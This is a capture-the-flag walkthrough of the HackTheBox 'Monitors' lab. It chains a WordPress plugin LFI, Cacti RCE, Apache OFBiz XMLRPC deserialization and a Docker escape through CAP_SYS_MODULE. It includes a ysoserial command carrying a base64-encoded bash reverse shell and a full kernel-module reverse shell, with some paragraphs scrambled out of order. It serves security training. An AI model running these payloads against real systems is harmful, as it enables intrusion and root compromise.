📕
HackTheBox - Linux
  • HackTheBox - Registry
  • HackTheBox - Scavenger
  • HackTheBox - Ellingson
  • HackTheBox - OneTwoSeven
  • HackTheBox - Player
  • HackTheBox - Zipper
  • HackTheBox - Dab
  • HackTheBox - Kotarak
  • HackTheBox - Ghoul
  • HackTheBox - Mango
  • HackTheBox - Feline
  • HackTheBox - Joker
  • HackTheBox - Unbalanced
  • HackTheBox - Compromised
  • HackTheBox - Obscurity
  • HackTheBox - Monitors
  • HackTheBox - Windows
Powered by GitBook
On this page
  • Nmap scan results
  • Enumerating Wordpress
  • WP Spritz Plugin (Vulnerable to LFI)
  • Discovering cacti-admin.monitors.htb (Virtual host)
  • Exploiting Cacti (SQLi/ Remote Code Execution)
  • Docker Enumeration (Scanning for hosts)
  • Forwarding the ports to our local machine using chisel
  • Exploiting Apache OFBiz XMLRPC Deserialization (RCE)
  • Escaping docker using SYS_MODULE Capability

Was this helpful?

HackTheBox - Monitors

PreviousHackTheBox - Obscurity

Last updated 4 years ago

Was this helpful?

This box is one of my favourite one as it contains a lot of CVE related vulnerabilities. CVE means that it is related to Real World vulnerabilities. So let's get started.

Nmap scan results

nmap -A -T4 -p- -oA nmap-allport 10.10.10.238

Its always good to scan all the ports. I will be adding monitors.htb to /etc/hosts file.

Enumerating Wordpress

I will be using wpscan tool which can help us identify potential vulnerable plugins and probable users.

wpscan --url http://monitors.htb/ --enumerate u,vp

The tool didn't gave us any vulnerable plugins, so I will manually try to browse the plugin directory. The directory is located at /wp-content/plugins/

WP Spritz Plugin (Vulnerable to LFI)

Discovering cacti-admin.monitors.htb (Virtual host)

There's also virtual hosting present. We can add cacti-admin.monitors.htb into our /etc/hosts file.

We have credentials, maybe we can try default usernames like admin, administrator, guest, etc. I tried admin : BestAdministrator@2020! and got access to it. (Lucky af)

Exploiting Cacti (SQLi/ Remote Code Execution)

The version of cacti used is 1.2.12. So let's search for any known vulnerabilities on google.

Read what the misconfiguration is and download the exploit. We need to provide credentials to exploit this vulnerability.

Docker Enumeration (Scanning for hosts)

After getting the shell, I got stuck for a very long time. Then I decided to proceed with docker enumeration. (I checked it using ifconfig command)

So to search for other hosts present on docker interface, I grabbed the static nmap binary from my machine using netcat. (As curl and wget not installed on the system)

Now we can use nmap to scan for ports as well but I like this script which is comparitively fast and easy.

#!/bin/bash

ip=$1

if [[ $# -eq 0 ]];then
        echo "[-] Supply IP Address"
        exit 0
fi

for i in `seq 1 65535`;do
        echo 1 > /dev/tcp/$ip/$i
        if [[ $? -eq 0 ]];then
                echo "[+] Port open: $i"
        fi
done

Forwarding the ports to our local machine using chisel

./chisel server --reverse -p 9002 (My local machine)
./chisel client 10.10.14.44:9002 R:8443:127.0.0.1:8443 & (Remote machine)
./chisel client 10.10.14.44:9002 R:8081:127.0.0.1:8080 & (Remote machine)

Apache OFBiz is an open source enterprise resource planning system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. OFBiz is an Apache Software Foundation top level project.

Exploiting Apache OFBiz XMLRPC Deserialization (RCE)

We can look for known vulnerabilities out there on google. The version we are running is 17.12.01. Got using ps aux (which lists the running processes)

This one looks satisfying. To exploit this vulnerability, we need to send malicious serialized data to /webtools/control/xmlrpc.

Intercept the request in Burp and change the request method to POST. Also change the Content-Type header to application/xml

<?xml version="1.0"?>
<methodCall>
    <methodName>
        ProjectDiscovery
    </methodName>
    <params>
    <param>
        <value>
            <struct>
                <member>
                    <name>
                        test
                    </name>
                        <value>
                            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                                [Malicious Serialized Data]
                            </serializable>
                        </value>
                </member>
            </struct>
        </value>
    </param>
    </params>
</methodCall>
java -jar ysoserial.jar CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40NC8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}' | base64 -w 0

Copy the payload and paste it in Burp. Make sure you are listening on port you specified.

Now if you will check the capabilities, we have cap_sys_module.(Check it using capsh --print)

The CAP_SYS_MODULE capability allows loading modules from anywhere, rather than restricting the module search path to /lib/modules/..

We can exploit this to get root access on host machine. The above article explains it very well. 

// Reverse shell - I named it to be shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.2/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
// Makefile 
obj-m +=shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Now we need to listen on port 4444 before we insert this module.

And now insert the module using insmod command.

We can FUZZ the url parameter from this wordlist over or we can try to manually FUZZ it. First thing to look for is Apache log poisoining followed by old school tricks. That didn't gave us anything. So next thing to look for is apache2.conf file. Also another thing to look for is wp-config.php which might contain potential usernames and passwords.

Now I will be forwarding these ports to my local machine using chisel. You can get chisel from .

So apache ofbiz is running on port 8443, we can check that by going to

Now to generate the serialized data, I will be using ysoserial.jar. Download the jar file from . Use this to generate reverse shell payloads for Java deserialization.

Escaping docker using Capability

here
here
https://127.0.0.1:8443/catalog
here
website
SYS_MODULE
WordPress Plugin WP with Spritz 1.0 - Remote File InclusionExploit Database
Logo
Zero Day Initiative — CVE-2020-9496: RCE in Apache OFBiz XMLRPC via Deserialization of Untrusted DataZero Day Initiative
Abusing SYS_MODULE capability to perform Docker container breakoutMedium
Logo
Logo